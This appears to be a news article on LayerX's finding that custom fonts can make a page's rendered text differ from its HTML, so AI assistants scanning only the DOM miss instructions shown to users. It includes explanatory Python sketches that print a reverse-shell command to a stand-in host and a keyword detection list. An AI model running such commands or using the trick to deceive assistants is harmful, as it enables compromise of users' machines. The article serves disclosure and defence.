A recently disclosed attack technique highlights a structural disconnect between the text in a page's HTML and what users actually see in their browsers, allowing attackers to deliver malicious instructions that go unnoticed by artificial intelligence assistants. The finding was presented by LayerX, a cybersecurity company, which demonstrated the technique on a fake BioShock fanfiction site: by loading a custom font, the attackers hid a malicious message inside seemingly harmless content.
Hidden Threats in HTML
The attack revealed that although AI assistants such as ChatGPT and Claude examine the underlying HTML for threats, they cannot tell when that text diverges from what the page actually renders. In LayerX's demonstration, the text shown to users urged them to execute a reverse shell on their machines, while the underlying HTML held only a string of unreadable characters that no text scanner would flag.
LayerX points out that the vulnerability requires no JavaScript or exploit kits, exposing a flaw in how AI tools assess the safety of web pages. Browsers draw text as the page's fonts and styles dictate, but AI assistants treat the DOM text as a complete and faithful representation of what the user sees, leaving a gap that attackers can exploit.
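The gap can be sketched in a few lines. The glyph map, message, and scanner below are hypothetical illustrations, not LayerX's actual payload: a custom font acts, in effect, like a substitution table between stored codepoints and drawn glyphs, so a DOM-only scanner and a human reader end up looking at different strings.

```python
# Toy sketch of the DOM/render mismatch (hypothetical, not LayerX's code).
# A one-codepoint shift stands in for a malicious font's glyph table.

RENDERED = "To continue, paste into a terminal: bash -i >& /dev/tcp/evil/4444 0>&1"

# What actually sits in the HTML: each character shifted by one codepoint.
dom_text = "".join(chr(ord(c) + 1) for c in RENDERED)

def render(text: str) -> str:
    """Stand-in for the custom font's character-to-glyph mapping."""
    return "".join(chr(ord(c) - 1) for c in text)

def naive_dom_scan(text: str) -> bool:
    """Simplified stand-in for an assistant that inspects only DOM text."""
    suspicious = ("reverse shell", "bash -i", "/dev/tcp")
    return any(s in text.lower() for s in suspicious)

print(naive_dom_scan(dom_text))          # the stored gibberish looks harmless
print(naive_dom_scan(render(dom_text)))  # the user-visible message does not
```

The scanner's verdict flips depending on which side of the font it reads, which is the whole attack in miniature.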

In response to this threat, LayerX recommends that AI providers implement dual rendering analysis, comparing the DOM text against what is actually drawn on screen, and treat custom fonts as a potential threat surface. These tools should also refrain from issuing security verdicts before verifying the full context of a page. So far, Microsoft stands out as the only provider to have fully addressed the issue following LayerX's responsible disclosure in December 2025.
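A minimal sketch of that recommendation, with function names and the detection rule of my own invention rather than LayerX's: any page that ships its own fonts is treated as one whose DOM text cannot be trusted alone, and is escalated to a render-level check before a safety verdict is issued.

```python
import re

def custom_font_rules(html: str) -> list[str]:
    # Collect every @font-face rule: each one can remap codepoints to
    # glyphs, so DOM text styled with that font may not match the screen.
    return re.findall(r"@font-face\s*\{[^}]*\}", html, flags=re.IGNORECASE)

def needs_dual_rendering(html: str) -> bool:
    # Heuristic: a DOM-text-only verdict is unreliable on pages carrying
    # custom fonts; flag them for a DOM-vs-rendered-pixels comparison.
    return bool(custom_font_rules(html))

page = """
<style>
  @font-face { font-family: 'Fanfic'; src: url('/fonts/fanfic.woff2'); }
  body { font-family: 'Fanfic', serif; }
</style>
<p>kzjq wvn qog rfmb...</p>
"""
print(needs_dual_rendering(page))  # escalate before calling the page safe
```

This only flags the threat surface; the actual comparison of DOM text against rendered pixels would need a headless browser and is outside the scope of this sketch.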
